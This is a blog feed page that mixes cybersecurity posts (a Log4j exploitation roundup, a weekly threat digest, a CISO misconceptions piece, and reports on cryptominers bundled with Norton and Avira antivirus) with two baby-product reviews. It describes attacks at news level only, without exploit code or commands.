Log4j One Month On | Crimeware and Exploitation Roundup

/0 Comments/in /by

It has been 31 days since the initial public disclosure of a remote code execution (RCE) critical vulnerability in the Apache Log4j logging library that upended enterprise security at the close of 2021. In that time, since the initial CVE-2021-44228 (critical), we’ve already seen five more related CVEs

  • CVE-2021-45046 (critical)
  • CVE-2021-4104 (high)
  • CVE-2021-42550 (moderate)
  • CVE-2021-45105 (moderate)
  • CVE-2021-44832 (moderate))

and several updates to the library from 2.15.01 on December 9th to 2.17.1 on December 28th.

The importance of this class of vulnerabilities in such a ubiquitous library must not be forgotten with the next spin of the cyber news cycle: with millions of vulnerable devices, attacks are likely to continue for as long as such devices running unpatched software can be found by threat actors.

In this post, we round up all the activity to date concerning Log4Shell exploits to underscore the importance of timely discovery and patching of affected systems.

Log4j Initial Impact | Criminals and Researchers Equally Alert

As described in more detail here, there are two novel characteristics of a Log4j attack:

  1. The attacking string can be injected into any user input that will be logged such as an http header, a username, or a file name.
  2. The server the attacker communicates with and the server being attacked can be completely different and even located within different networks. In this case, internal logging servers located within trusted networks can suddenly communicate with attackers on the internet.

These characteristics provide a simple and potent tool and it took less than 24 hours after public disclosure of CVE-2021-44228 for attackers to generate over 60 permutations of the attack string.

Within hours of the public disclosure, we saw discussion and adoption of the issue within well-known underground Russian crime forums.

RU forum discussions

Researchers in the Chinese hacking community also claimed to have seen evidence of fast-automated exploitation tools Log4j_RCE_Tool, ReverseShell PoCs and an increasing number of articles on exploiting additional JNDI vulnerabilities in IBM WebLogic servers.

Meanwhile, researchers found that their Log4j honeypots were lighting up with alarming speed within 24 hours of the initial disclosure.

December 2021 | Log4Shell Attacks In the Wild

The first wave of attacks using the Log4Shell exploit were relatively unsophisticated actors dropping various cryptominers on victims. Perhaps most audacious of these was a reported 8-day long hack of HP AMD-based 9000 EYPC servers that was used to mine around 3.4 million Raptoreum coins, with an approximate value of $110,000. It is thought that the attackers were able to cash-out about half of the coins they mined before the operation was shut down.

Miner attacks were quickly followed with the appearance of a number of new ransomware families taking advantage of Log4j as a means of initial access, such as Khonsari ransomware. Attackers exploited Log4j to download and launch a malicious Java class file, which then retrieved the Khonsari ransomware payload from a C2.

Additional ransomware families soon followed, including TellYouThePass. This family had been relatively dormant prior to the Log4j vulnerability disclosure. TellYouThePass has both Windows and Linux variants, allowing it to attack the majority of servers likely to be vulnerable to Log4j exploitation.

Conti Attacks Log4j-Vulnerable Devices Not Exposed to the Public Internet

Within days of the flaw being disclosed, Conti ransomware campaigns were reportedly observed taking advantage of the vulnerability, with multiple campaigns focused on high-value vCenter environments. This development is noteworthy as the target machines were not necessarily exposed to the public internet. Rather, where the Conti operators had already gained an initial foothold into a target’s network, they exploited Log4j to compromise and encrypt vulnerable vCenter servers within the network.

Naturally, the Emotet crew has been taking advantage of Log4j as well. For example, vulnerable servers were quickly compromised and used for staging and payload hosting within the greater Emotet network. While we fully expect Emotet to embrace Log4j for direct delivery, we have yet to observe this development. However, we do currently see the use of Log4j to deliver Cobalt Strike Beacons, which can then be followed by any number of payloads.

In mid-December, Vietnamese crypto-exchange ONUS was attacked via exploitation of Log4j. The attack likely occurred within two to three days of the initial Log4j disclosure. The company patched their vulnerable servers sometime after the 13th of December, by which time the company had already been breached. The attackers later attempted to extort the company out of $5 million. For that amount, the attackers offered not to leak a cache of stolen data including PII. After the Fintech firm refused to pay, the attackers attempted to sell this data on a well-known hacking forum on December 25th:

Hackers try to sell data from log4j compromise

Ransomware operators and extortionists are not the only ones getting in on the action. The actors behind Dridex have also expediently adopted the use of this exploit for their own nefarious purposes. In mid to late December, we saw mass distribution of Dridex by way of Log4j. In most cases, the exploit was used to load a malicious Java class, followed by a .HTA file containing a VBScript. From there we see more of a standard DLL-based flow.

January 2022 | Regulators and CISA Add Pressure to Remediate Log4j

On January 4th, the pressure for enterprises to ensure they have taken appropriate steps to remediate assets running vulnerable Log4j libraries was ramped up even further by the FTC.

Noting that Log4j “poses a severe risk to millions of consumer products” and that the vulnerability is being widely exploited by a growing set of threat actors, the FTC said on January 4 that it will

“use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j”.

Meanwhile, on Jan 6, 2022 CISA noted that, based on submissions to the agency’s catalog, there are at least 2800 distinct products that contain Log4j. The agency estimates that despite the determined action by many admins and security teams during December 2021, there are likely still “hundreds of millions” of individual devices still affected by the Log4j vulnerabilities.

What Comes After Log4j?

Log4j could be just the the beginning of a whole new class of bugs. It turns out that the JNDI API is very attractive as a means of compromise as it allows simple unauthenticated remote code execution. A new JNDI-based “Log4j-like” critical vulnerability was disclosed on Jan 7, 2022. Tracked as CVE-2021-42392, this related RCE flaw was discovered in H2 database consoles, an open-source relational database management system written in Java. Although far from as widespread as the Log4j vulnerability, it is estimated to affect almost 7000 assets including popular frameworks like JHipster, Play framework and Spring Boot.

Conclusion

Unfortunately for overworked admins and security teams, a new year doesn’t mean an end to old problems, and exploitation of the Log4j and related JNDI vulnerabilities is going to be haunting many defenders for some time to come. Again, we urge all to stay ahead of the Log4j situation and ensure vulnerable software is patched to the latest version of Log4j or removed where that is not possible.

If there’s any silver lining to this dark cloud it is that in order for threat actors to capitalize on vulnerabilities, they need to engage in malicious behaviour, and that’s where on-device, AI-powered endpoint protection comes into its own. Whether its cryptominers or malware loaders, ransomware or banking trojans, deploying an autonomous detection and mitigation solution is an essential part of defending the modern organization from compromise.

If you would like to see how SentinelOne can help defend your organization, contact us or request a free demo.

Resource Center | Log4j2 | Log4Shell Vulnerability
Stay Informed with Hunting Queries, Demos, and More

Learn More

Baby Racing Car Seat From Delta Children

/0 Comments/in /by

You read it right! Delta Children, the company known and loved for their eye-catching baby chairs and accessories, has created something for the little ones who were born with the speed in their veins.

Delta Children Sit N Play Portable Activity Seat for Babies is what you might call a sporty addition to the baby gear family. It is safe, comfortable, sturdy, and perfectly adjustable to any surface.

About Delta Children Portable Activity Chair

The Delta Children Sit N’ Play Portable Activity Seat will help your little one sit, interact, and play at home and on the road. The sturdy upright seat allows your baby to enjoy and interact with the world completely, while the beautiful design will look great in any room. The portable play seat is easy to fold for storage and take along, while the non-skid bottom will keep it secure on nearly any surface.

Your little one will love playing with the engaging race car-themed toys that help increase gross motor skills, and you’ll love how easy it is to clean–just remove the seat pad and pop it in the washing machine. The rest of the activity seat features water-and-stain-resistant fabric that’s easy to wipe clean!

This infant floor seat is perfect for traveling because of its innovative zippered design and convenient carry handle, which unzips to fold flat quickly.

Why choose a baby racing car seat?

Keeping your baby content in one spot is one of the most challenging tasks when it comes to caring for them. Babies love to move around and explore; they’re constantly crawling everywhere, looking for something they can pick up in their little hands, something that will bring them joy and entertainment.

This is where the Delta Children Sit N’ Play Portable Activity Seat comes in to help you. This product will have your child content on any surface, whether it’s at home or outside, on the porch, for example. You can place it anywhere, and your baby will be thrilled playing with the interactive toys that are included.

It is also vital to consider kids’ interests as soon as possible. You don’t want to wait until they’re older and have become bored with the toys you chose for them during their infantile stage. Let them play with what they enjoy, let them be kids while they still can, and once they get a bit older, things will start getting complicated because of what is expected from them in terms of behavior and maturity.

Quality kids’ chairs at your reach

Besides being a practical solution for your child’s entertainment needs, the Delta Children Sit N’ Play Portable Activity Seat is also very affordable. Now you can have a play seat for your infant that won’t break the bank as it costs just as much as other products on the market today.

Delta Children products were mentioned on ComfyBummy numerous times. You can, for example, see reviews for their amazing kids’ Frozen chairs or explore our guide to the Delta Children’s products.

You’ll never go wrong having Delta Children around. Their products are some of the most durable ones you’ll find, not only when it comes to kids’ furniture but also in terms of toys. Their quality is extremely high while their prices are fair enough that everyone can buy their products. You can find them on Amazon, where you can browse their many items and choose the one you like most.

The post Baby Racing Car Seat From Delta Children appeared first on Comfy Bummy.

500M Avira Antivirus Users Introduced to Cryptomining

/0 Comments/in /by

Many readers were surprised to learn recently that the popular Norton 360 antivirus suite now ships with a program which lets customers make money mining virtual currency. But Norton 360 isn’t alone in this dubious endeavor: Avira antivirus — which has built a base of 500 million users worldwide largely by making the product free — was recently bought by the same company that owns Norton 360 and is introducing its customers to a service called Avira Crypto.

Avira Crypto

Founded in 2006, Avira Operations GmbH & Co. KG is a German multinational software company best known for their Avira Free Security (a.k.a. Avira Free Antivirus). In January 2021, Avira was acquired by Tempe, Ariz.-based NortonLifeLock Inc., the same company that now owns Norton 360.

In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019. LifeLock is now included in the Norton 360 service; Avira offers users a similar service called Breach Monitor.

Like Norton 360, Avira comes with a cryptominer already installed, but customers have to opt in to using the service that powers it. Avira’s FAQ on its cryptomining service is somewhat sparse. For example, it doesn’t specify how much NortonLifeLock gets out of the deal (NortonLifeLock keeps 15 percent of any cryptocurrency mined by Norton Crypto).

“Avira Crypto allows you to use your computer’s idle time to mine the cryptocurrency Ethereum (ETH),” the FAQ explains. “Since cryptomining requires a high level of processing power, it is not suitable for users with an average computer. Even with compatible hardware, mining cryptocurrencies on your own can be less rewarding. Your best option is to join a mining pool that shares their computer power to improve their chance of mining cryptocurrency. The rewards are then distributed evenly to all members in the pool.”

NortonLifeLock hasn’t yet responded to requests for comment, so it’s unclear whether Avira uses the same cryptomining code as Norton Crypto. But there are clues that suggest that’s the case. NortonLifeLock announced Avira Crypto in late October 2021, but multiple other antivirus products have flagged Avira’s installer as malicious or unsafe for including a cryptominer as far back as Sept. 9, 2021.

Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.

The above screenshot was taken on Virustotal.com, a service owned by Google that scans submitted files against dozens of antivirus products. The detection report pictured was found by searching Virustotal for “ANvOptimusEnablementCuda,” a function included in the Norton Crypto mining component “Ncrypt.exe.”

Some longtime Norton customers took to NortonLifeLock’s online forum to express horror at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” reads a Dec. 28 thread on Norton’s forum titled “Absolutely furious.”

Others have charged that the crypto offering will end up costing customers more in electricity bills than they can ever hope to gain from letting their antivirus mine ETH. What’s more, there are hefty fees involved in moving any ETH mined by Norton or Avira Crypto to an account that the user can cash out, and many users apparently don’t understand they can’t cash out until they at least earn enough ETH to cover the fees.

In August 2021, NortonLifeLock said it had reached an agreement to acquire Avast, another longtime free antivirus product that also claims to have around 500 million users. It remains to be seen whether Avast Crypto will be the next brilliant offering from NortonLifeLock.

As mentioned in this week’s story on Norton Crypto, I get that participation in these cryptomining schemes is voluntary, but much of that ultimately hinges on how these crypto programs are pitched and whether users really understand what they’re doing when they enable them. But what bugs me most is they will be introducing hundreds of millions of perhaps less savvy Internet users to the world of cryptocurrency, which comes with its own set of unique security and privacy challenges that require users to “level up” their personal security practices in fairly significant ways.

The Good, the Bad and the Ugly in Cybersecurity – Week 1

/0 Comments/in /by

The Good

It sounds like a tagline for the latest scary film: This week…in a holding cell…THE SPINE COLLECTOR!, but this is no work of fiction. We start 2022 with a breakthrough in a real-life cyber mystery that has been puzzling and plaguing the publishing world for years. On Wednesday, news broke that the FBI had arrested a notorious and elusive cyber thief nicknamed “The Spine Collector” at JFK airport.

Filippo Bernardini, a 29 year-old employee of Simon & Schuster, was arrested and taken into custody on suspicion of wire fraud and aggravated identity theft spanning almost five years. Bernardini is believed to have masqueraded as a plethora of different editors, publishers and others in the literary profession over several years with the goal of stealing unpublished books, novels, and manuscripts, including works by bestselling authors such as Margaret Atwood and Ethan Hawke.

According to the charges filed against him, Bernardini had registered nearly 200 typosquatting domains in order to deliver spear-phishing emails to selected targets in the publishing industry. While the Spine Collector successfully stole hundreds of pieces of work, it seems he never attempted to trade or share the works he pirated, and his precise motivations still remain a mystery at this time.

The Spine Collector’s antics, which began around 2017, had become so widespread within the publishing industry that several amateur sleuths had tried to crack the case. There was widespread speculation and suspicion that the thief was an industry insider, and the whole story makes for a fascinating read itself.

That said, what can we learn from this? Nobody is immune from spear-phishing and social engineering, even when immediate financial risk may not seem to be in play. What motivates criminals and fraudsters can sometimes be factors other than money, but our defenses must be in place all the same.

The Bad

This week also saw disclosure of an attack by the Karakurt group on Tourisme Montréal (aka Visit Montreal), which represents 900 tourism industry stakeholders aiming to promote the Canadian city. The attack, which occured in December, is just one of a number in a recent uptick in Karakurt activity, all of which are primarily targeting businesses in North America.

A spokesperson for Tourisme Montréal stated that they had immediately retained security experts and that they are working to “ensure the integrity and security of our systems.” Given Karakurt’s MO, concerns remain around whether customer PII has been stolen, and the investigation is ongoing.

An image from the Karakurt leaks site

Karakurt appears to operate under a slightly atypical model. Unlike most ransomware groups, they do not attempt to encrypt victim files and instead focus entirely on exfiltration of data and subsequent extortion. Presumably, the gang has decided that there is plenty of profit to be made without the added hassle of dealing with malware (ransomware) or other tactics that would normally trip the alarms of endpoint security controls or cause service disruptions that might attract attention from the authorities.

Karakurt attacks focus heavily on the use of lolbins and COTS (Commercial Off-the-Shelf) tools. In addition, Karakurt will rely on tools like Anydesk or Cobalt Strike for delivery, staging and further lateral movement. The group is also known to purchase access or credentials for target environments (as opposed to initially breaching the target themselves).

Karakurt Extortion note

The takeaway here is that we all need to remain vigilant and keenly observant with regards to the use of non-malware TTPs in extortion attacks. While this is hardly a new message, we cannot remind ourselves too often of the lengths these criminals will go to.

The Ugly

Researchers at Palo Alto have uncovered a formjacking attack in which malicious JavaScript skimmer code is embedded in videos on a website. Other websites that embed the maliciously-crafted video will then in turn become infected with the same skimmer code. Approximately 100 real estate-focused websites appear to have been compromised using this method.

Based on the findings, the skimmer code is designed to extract email addresses, phone numbers, CC track data and other highly sensitive pieces of data. The attackers then exfiltrate any data obtained to their C2 via HTTP.

All in all a stealthy attack, but far from novel. Unfortunately, attacks don’t have to be shiny and new to work: bad guys will keep reusing whatever gets the job done.

To cap off this week, let’s not forget the ongoing Log4j2 issues (CVE-2021-44228, CVE-2021-44832). At the end of December, Log4j version 2.17.1 was released which addresses a newly discovered RCE (remote code execution) exploit. This newer vulnerability is tracked as CVE-2021-44832. We urge all to review their current posture with regards to the Log4j vulnerabilities to ensure they are as safe and protected as possible. As always, you can find the most up to date information on Log4j on our blog here.

The 9 Biggest Cybersecurity Lies Told to CISOs

/0 Comments/in /by

Cybersecurity can seem like a bit of a zoo these days. There are myriad problems to solve as the landscape changes under our feet with new technologies, evolving business needs, and an attack surface that continues to expand. Into this mix, add more vendors, more consultants and more experts, each with bold statements on how to win the war against cyber threat actors.

Unfortunately, while many of these attempts to make enterprises safer may be genuine, there are a lot of blanket statements out there that can undermine a CISO’s efforts to secure the business. In this post, I will try to tackle the most oft-repeated cybersecurity misconceptions we see thrown at CISOs.

1. Windows Security Is Enough To Secure Your Microsoft Endpoints

Who is the biggest security vendor of them all? Before taking a mental inventory of the major 3rd party players that no doubt immediately spring to mind, it might come as a surprise to realize that they are all outstripped by Microsoft, with its unique position as both OS vendor and vendor of security software for its own OS, variously known as ‘Microsoft Defender’, ‘Windows Defender’, and now ‘Windows Security’.

2021 was another bumper year of Microsoft vulnerabilities, exploits, and breaches, with threat actors taking quick and merciless advantage of Microsoft vulnerabilities in Exchange Server like ProxyLogon and ProxyShell. Those vulnerabilities were followed by PrintNightmare, which in turn was followed by HiveNightmare.

Microsoft Defender did little to halt any of the ransomware attacks by Hafnium and Conti gangs that exploited such vulnerabilities, and the product was itself also in the wars after it was revealed Defender contained a privilege escalation vulnerability for over 12 years.

Recent history suggests that CISOs that rely on an OS vendor to win a fight against ransomware are going to be on the losing side of the battle.

2. Macs are Safe ‘By Design’

Unlike Microsoft, Apple is not in the business of selling security software in an attempt to protect its own products, but it still actively promotes the security of macOS as one of the unique selling points of Macs over other hardware. Accordingly, Apple has a vested interest in discouraging the perception that third party security controls are required for Macs in the enterprise just as much as they are for other endpoints.

Apple admitted earlier this year that macOS does have a problem with malware, and while few companies use Macs as servers or network controllers, thus sparing them the attention of ransomware operators, they are extremely popular among both C-Suite executives and developers. This makes enterprise Macs juicy targets for threat actors interested in high-value targets, and the new macOS malware seen appearing over the last 12 months has mostly been espionage and backdoors directed at specific targets.

Meanwhile, Mac users themselves are largely unaware of the many ways that malware can and does beat the built-in security technologies used by Apple. The Mac’s built-in security relies heavily on code-signing, certificate revocation checks and legacy file signatures. Threat actors have little trouble in bypassing these, and like Microsoft Windows, the complexity of operating system software ensures that critical bugs are patched on an increasingly more frequent basis.

On top of that, the Mac’s built-in security controls offer no visibility to users or admins. As a CISO, how would your admins know if any of the Macs in your fleet were infected with a backdoor, spyware or other macOS malware without external security software to offer that visibility?

3. Prevention Isn’t Possible, and Detection Is Enough

It’s become a trope among legacy AV vendors in their attempts to excuse the failures of AV Suites and EPP to claim that prevention is impossible, and post-infection detection and quarantine is the only realistic goal.

But we are in 2022, we have had machine learning and AI at our disposal for years now, and there is no reason why any CISO should accept that a vendor cannot prevent file-based malware pre-execution or on-execution.

Vendors that rely entirely on signature-based detection should supplement or replace their detection engines with static AI engines that can prevent most types of malicious PE files. More importantly, CISOs should reject vendors that tell them prevention isn’t possible.

4. Zero Trust Is Achievable For Most Organizations

The tried-and-trusted adage that “You are only as strong as your weakest link” gains new poignancy in today’s move to Zero Trust environments. While embracing Zero Trust is part of the right direction in which to travel to reduce your attack surface, the reality is that most organizations cannot effectively implement a complete Zero Trust Architecture (ZTA) across multiple assets and security systems.

Organizations should exercise caution when vendors offer a “Zero Trust SKU”. Beyond the marketing spiel, achieving a ZTA security model requires integration across all technologies. There’s no “plug-and-play” way to transform your organization overnight. Indeed, moving from a legacy perimeter-based security model to a ZTA security model is a multi-year journey, while attacks on businesses occur on a daily basis.

ZTA is one piece in the security jigsaw, but enterprises need to cover their rear and have controls in place for when trust is breached, or simply never gained.

Like many developments in enterprise security, ZTA offers promise but it is no panacea. CISOs should beware vendors that tell them ZTA is a magic bullet that can solve all their security headaches.

5. Mobile Security Is Not a Must

Incredibly, there are vendors (and security practitioners) that still haven’t woken up to the reality of mobile devices in the enterprise. Sometimes, humans act like something doesn’t exist if they simply refuse to see it, but we have been checking our business emails and accessing work data from our mobile devices for years now. Most organizations understand that attempts to stop users conducting work tasks on their mobile devices leads to an unacceptable impact on productivity.

The mobile space is dominated by two main OS vendors, Google and Apple, and both understand the necessity of mobile security, although they take very different approaches to it. Recently, Google explained how an iOS zero-day, zero-click vulnerability had compromised Apple users. The technical level is beyond most skilled programmers and security professionals, let alone ordinary users.

Despite that sophistication, that exploit wasn’t developed by a nation-state actor but by the NSO Group, a private enterprise. In such a climate, where profit-driven attackers can invest that level of expertise into compromising our mobile devices, what business with intellectual property to defend, customer data to protect (and regulatory fines to avoid) can afford to pretend that mobile security is optional?

Mobile attacks are real and CISOs should apply mobile threat defense measures to keep track of user and device behavior and actions.

6. Backups Will Protect You Against Ransomware

The world of information security moves fast, and what was true yesterday (or, to be frank, a few years ago now) is not necessarily true today. Cast your mind back to NotPetya and WannaCry in 2017, and the hard-learned lesson that businesses without backups were setting themselves up as hostages to fortune, or rather the misfortune of being hit by ransomware.

The lesson didn’t go unheeded either by businesses or attackers, and by 2019 we saw the first human-operated ransomware gangs – Maze and DoppelPaymer – pivot to the double-extortion method: denial-of-access to files via encryption with the threat of public data leaks on top. Now, backups didn’t get companies off the hook if they valued the privacy of their data.

Double extortion soon became the standard MO for the majority of ransomware gangs, and some even went so far as to threaten to leak the data of clients or to ransom the clients of victim organizations.

Even so, some organizations were prepared to bite the bullet, risk data leakage, recover from backups and deny criminals a pay-day. Unfortunately, this only led the criminals to raise the stakes to triple extortion: on top of the threat of leaked data and file encryption, they started flooding victim companies with DDoS attacks to force them back to the negotiation table.

The lesson for CISOs is this: ransomware operators are flush with cash from previous victims. They can afford to buy large-scale botnets and hit your network with DDoS till you pay; they can afford to buy Initial Access from other criminals, and they can afford to pay human operators (aka “affiliates”) to carry out attacks. Backups mean nothing in today’s double and triple extortion ransomware threatscape. What matters is preventing compromise in the first place.

7. The Ransomware Threat Can Be Solved By Government

We’ve seen multiple worthy and valiant attempts to fight the growing surge in ransomware coming out of the U.S. government’s new focus on cybercrime.

The Colonial Pipeline attack, the JBS meat-supplier attack and others have created a growing concern for enterprises, as they feel they are left alone in the battle to keep our way of life safe. As laudable as the government’s efforts to take action are, cybercriminals are – by their very nature – undeterred by law enforcement.

No sooner had Biden and Putin discussed a crackdown on criminals that attacked healthcare and other critical infrastructure organizations than new groups emerged specifically to do just that. Where some criminals fear to tread, others will happily take their place if they sniff an opportunity to make money. Federal laws don’t exempt us from locking our own doors.

Yes, government help is always welcome. No, government help isn’t going to alleviate the need for enterprises to protect their businesses against crime.

8. You Don’t Need Humans If You Implement Automation

The cybersecurity skills shortage is real, but while automation can make valuable contributions to productivity and efficacy, automation will never replace the human element in the cybersecurity equation.

Risk is not static, and the risk surface constantly grows and changes as organizations mature and expand their businesses. More services, more production servers, more flow, and more customer data make the challenge to reduce risk an ongoing journey rather than a single task that can be completed with some consolidated effort. As there is no silver bullet to understand enterprise risk or quantify the means to keep a business safe, there will always be a need for cybersecurity talent that can innovate, assess and close these gaps.

Attack vectors are also constantly evolving. Three years ago, organizations relied on static analysis of PEs and other executable files to detect and prevent malware. Soon after, we started seeing fileless, script-based attacks, and lateral movement attempts successfully penetrating enterprise networks. A massive storm of supply chain attacks, like SolarWinds, Kaseya, and more have added yet another dimension to risk management. Meanwhile, the ransomware economy created a massive network of affiliates that used new spam techniques to bypass traditional solutions.

Yes, humans need technology to help scale, maximize productivity, eliminate mundane tasks, and create focus on critical items needing attention, but the best case scenario is that cybersecurity automation will reduce the growing landscape and attack surface.

CISOs will still need smart people who can connect, operate and triage all that attackers (with their own automation tools to hand) will continue to throw at us.

9. MDR Is All You Need To Stay Safe

While automation will never replace the need for human analysts, there is a converse to that, too: humans will never be able to detect, respond and remediate identifiable attacks as fast as computers. We need to use our human and computer resources in ways that are appropriate to the tasks each is best suited to.

Humans will do far better at triaging the edge cases, unknowns and false positives, but on-device AI that never sleeps and works at the speed of your CPU will beat attackers much faster than a remote MDR analyst in the cloud getting a delayed and partial feed of your network telemetry.

Yes, MDR offers added-value to a good next-gen AI endpoint protection agent. No, MDR is no substitute for on-device, autonomous protection, as the 2020 MITRE results convincingly proved.

Conclusion

There’s no escaping the fact that cybersecurity is a complex business, but getting the basics right is the first step. Reduce your dependencies on OS vendors, deploy on-device endpoint protection that offers visibility across your entire estate, and retain cybersecurity talent: these are all sound starting points for every CISO.

Meanwhile, try to see through the misconceptions that are passed around on a regular basis. I’ve called out nine of the most common ones I hear in this post, but there are undoubtedly far more howling in the wind. What other well-intentioned statements that do more harm than good are out there? We’d love to hear your thoughts on LinkedIn, Twitter, and Facebook!

Norton 360 Now Comes With a Cryptominer

/0 Comments/in /by

Norton 360, one of the most popular antivirus products on the market today, has installed a cryptocurrency mining program on its customers’ computers. Norton’s parent firm says the cloud-based service that activates the program and allows customers to profit from the scheme — in which the company keeps 15 percent of any currencies mined — is “opt-in,” meaning users have to agree to enable it. But many Norton users complain the mining program is difficult to remove, and reactions from longtime customers have ranged from unease and disbelief to, “Dude, where’s my crypto?”

Norton 360 is owned by Tempe, Ariz.-based NortonLifeLock Inc. In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019 (LifeLock is now included in the Norton 360 service).

According to the FAQ posted on its site, “Norton Crypto” will mine Ethereum (ETH) cryptocurrency while the customer’s computer is idle. The FAQ also says Norton Crypto will only run on systems that meet certain hardware and software requirements (such as an NVIDIA graphics card with at least 6 GB of memory).

“Norton creates a secure digital Ethereum wallet for each user,” the FAQ reads. “The key to the wallet is encrypted and stored securely in the cloud. Only you have access to the wallet.”

NortonLifeLock began offering the mining service in July 2021, but the program gained broader attention on Jan. 4 when Boing Boing co-editor Cory Doctorow tweeted that NortonCrypto would run by default for Norton 360 users.

NortonLifeLock says Norton Crypto is an opt-in feature only and is not enabled without user permission.

“If users have turned on Norton Crypto but no longer wish to use the feature, it can be disabled by temporarily shutting off ‘tamper protection’ (which allows users to modify the Norton installation) and deleting NCrypt.exe from your computer,” NortonLifeLock said in a written statement. However, many users have reported difficulty removing the mining program.

From reading user posts on the Norton Crypto community forum, it seems some longtime Norton customers were horrified at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“How on Earth could anyone at Norton think that adding crypto mining within a security product would be a good thing?,” reads a Dec. 28 thread titled “Absolutely furious.”

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” the post reads. “The product people need firing. What’s the next ‘bright idea’? Norton Botnet? ‘ And I was just about to re-install Norton 360 too, but this has literally has caused me to no longer trust Norton and their direction.”

It’s an open question whether Norton Crypto users can expect to see much profit from participating in this scheme, at least in the short run. Mining cryptocurrencies basically involves using your computer’s spare resources to help validate financial transactions of other crypto users. Crypto mining causes one’s computer to draw more power, which can increase one’s overall electricity costs.

“Norton is pretty much amplifying energy consumption worldwide, costing their customers more in electricity use than the customer makes on the mining, yet allowing Norton to make a ton of profit,” tweeted security researcher Chris Vickery. “It’s disgusting, gross, and brand-suicide.”

Then there’s the matter of getting paid. Norton Crypto lets users withdraw their earnings to an account at cryptocurrency platform CoinBase, but as Norton Crypto’s FAQ rightly points out, there are coin mining fees as well as transaction costs to transfer Ethereum.

“The coin mining fee is currently 15% of the crypto allocated to the miner,” the FAQ explains. “Transfers of cryptocurrencies may result in transaction fees (also known as “gas” fees) paid to the users of the cryptocurrency blockchain network who process the transaction. In addition, if you choose to exchange crypto for another currency, you may be required to pay fees to an exchange facilitating the transaction. Transaction fees fluctuate due to cryptocurrency market conditions and other factors. These fees are not set by Norton.”

Which might explain why so many Norton Crypto users have taken to the community’s online forum to complain they were having trouble withdrawing their earnings. Those gas fees are the same regardless of the amount of crypto being moved, so the system simply blocks withdrawals if the amount requested can’t cover the transfer fees.

I guess what bothers me most about Norton Crypto is that it will be introducing millions of perhaps less savvy Internet users to the world of cryptocurrency, which comes with its own set of unique security and privacy challenges that require users to “level up” their personal security practices in fairly significant ways.

Several of my elder family members and closest friends are longtime Norton users who renew their subscription year after year (despite my reminding them that it’s way cheaper just to purchase it again each year as a new user). None of them are particularly interested in or experts at securing their computers and digital lives, and the thought of them opening CoinBase accounts and navigating that space is terrifying.

Big Yellow is not the only brand that’s cashing in on investor fervor over cryptocurrencies and hoping to appeal to a broader (or maybe just older) audience: The venerable electronics retailer RadioShack, which relaunched in 2020 as an online-focused brand, now says it plans to chart a future as a cryptocurrency exchange.

“RadioShack’s argument is basically that as a very old brand, it’s primed to sell old CEOs on cryptocurrency,” writes Adi Robertson for The Verge.

“Too many [cryptocurrency companies] focused on speculation and not enough on making the ‘old-school’ customer feel comfortable,” the company’s website states, claiming that the average “decision-making” corporate CEO is 68 years old. “The older generation simply doesn’t trust the new-fangled ideas of the Bitcoin youth.”

Deuter Kid Comfort Pro – Child Carrier You Can Trust

/0 Comments/in /by

When you’re out for a hike with your kids, the most important thing about choosing the right child carrier is to make sure it’s going to be comfortable not only for yourself but also for your child. I was more than happy to test a child carrier from a reputable German company Deuter which has been designing and building top-quality backpacks and child carriers since 1938.

The popularity of Deuter products does not come by accident. Their backpacks and carriers are stylish, comfortable, practical, and durable. The customers love the great mix of reliable materials, functional design, and good looks. Deuter uses quality products and modern designs to meet all of your child’s comfort needs.

This product has a high rating of 4.8 stars with over 200 reviews on Amazon. There is no doubt that this child carrier certainly is one of the best available at the moment on the market, but is it worth every cent you pay for? It indeed comes packed with features but let’s look at them now.

Deuter Kid Comfort Pro Features

  • Aircomfort back system
  • The large VariFlex ECL hip fins are energy-efficient and can be adjusted for maximum comfort.
  • With VariSlide back-length with the wide-ranging adjustment, you may adjust the child carrier to fit either parent comfortably.
  • The Pull-Forward system construction makes it simple to adjust the hip belt even when you’re carrying a lot of weight.
  • The height-adjustable child’s seat has a variable cushion width to promote a healthy sitting posture.
  • Integrated safety harness – keeps kids safe and sound while you’re biking
  • 3 outer pockets for snacks, toys, and more
  • The durable aluminum frame with a sturdy kickstand is tip-resistant, which is very useful when loading the child.
  • Permanently integrated sunroof and a mirror for a rearview. Child Carrier comes with a backpack that may be used separately.

Deuter Kid Comfort Pro child carrier is suitable for children from 8 months old up to 45 pounds or 4 years of age. It has a ventilated back system that allows air to circulate, which is excellent news for your child’s comfort as not many offer this feature. It also comes with lumbar support and elastic on the hip belt, making it exceptionally comfortable for you, especially when carrying your child for more extended periods.

This child carrier comes with a sunshade, and we all know how precious this can be when you take your kid out, and the elements (or other people) get in their eyes. The sun can also heat up quite quickly, and it will make them hot and fussy, so if you plan on taking your child out for a long time, make sure you take something along to protect them.

It’s also really lightweight (8 lbs 5 oz), even considering all its features! It can be easily stored into the boot of your car or just about anywhere else when you aren’t using it while still having access to everything you need while out and about with your child.

It also comes with a rain cover to protect your child when the weather is not in your favor. This rain cover is operated by just one zip, which you will find on the front of the carrier. You can see how much easier this makes it for when you need it. Don’t get caught in the elements when you have your child with you, no matter where you are!

If you plan on going on a hike or anything else of the sort with your child, this carrier is comfortable enough for it. The shoulder straps come with adjustable load lifters to get the right comfort level no matter what you are doing.

Pros of the Deuter Kid Comfort Pro

  1. The Deuter’s padded back system ensures your child is both comfortable and safe during a hike, as it distributes their weight equally on your shoulders and your back. This helps to reduce pressure points that can cause pain and put you off from doing the activities you love.
  2. The unique child harness protects your child as it’s designed to keep them securely in their seat, right throughout even the roughest trails or any unexpected accidents that might happen along the way! This is especially valuable if your little one has fallen asleep on the track, as the harness will help to keep them seated in comfort against your back.
  3. The additional safety features of the Deuter Kid Comfort Pro will put your mind at ease as it comes with a fully adjustable footrest and the 5-point harness that is padded and reinforced for extra sturdiness and durability. The footwell can be adjusted depending on your child’s size and allows them to participate in the hike instead of just getting carried along.
  4. This child carrier is perfect for both short and tall parents as it has several height adjustments so that even if you are very short or very tall, this unit will work well with you!
